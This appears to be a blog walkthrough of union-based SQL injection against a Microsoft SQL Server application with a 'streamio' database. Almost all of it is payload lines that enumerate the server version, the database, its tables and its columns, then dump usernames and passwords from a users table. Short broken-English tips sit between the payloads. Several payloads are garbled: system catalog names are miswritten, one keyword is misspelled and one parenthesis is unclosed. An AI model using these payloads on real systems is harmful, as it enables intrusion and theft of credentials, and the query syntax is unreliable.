speculating echoed bit location
1' union select 1,2,3,4,5,6;-- -
echo bit at 2 and 3
mssql version detecting
1' union select 1,@@version,3,4,5,6;-- -
confirming the current database
1' union select 1,db_name(),3,4,5,6;-- - ##error
--
except system variable,we have to use select to bring out data from master..systemdatabases
1' union select 1,(select db_name()),3,4,5,6 from master..systemdatabases;-- - ##true
exploring the table from streamio(db_name())
1' union select 1,name,id,4,5,6 from master..systemdatabases where xtype='U';-- -
--
tips:because this table was created by user,the storage type 'xtype' is 'U' and we must specify xtype
at the time we query for table
exploring the columns from name and id
1'union selct 1,col_name(object_id('users'),2,3,4,5,6 from systemobject;-- - X #error
--
a.we have to specify database's systemobjects that inquire data
b.we have to remember when want to inquire columns using col_name(object_id('xx')) and id to query
--
1' union select 1,col_name(object_id('users')),2,3,4,5,6 from streamio..systemobjects
where id in (885578193,9051578250);-- -
extracting the data stored in columns
1' union select 1,concat(username,0x7e,password),3,4,5,6 from users;-- -
1' union select 1,concat(username,':',password),3,4,5,6 from users;-- -
steps over
summary
the vital thing in mssql query as following:
1.two system level variable master..systemdatabases and db_name()_systemobjects
2.table query need to distinguish variable xtype ,sql server have different components like user customized database with table named U and system level database named S
3.if the data stored in columns that too big for echoed bit,we have to utiliz concat to bring out the data without truncation
标签:actual,name,combat,database,--,id,union,mssql,select From: https://www.cnblogs.com/lisenMiller/p/17741799.html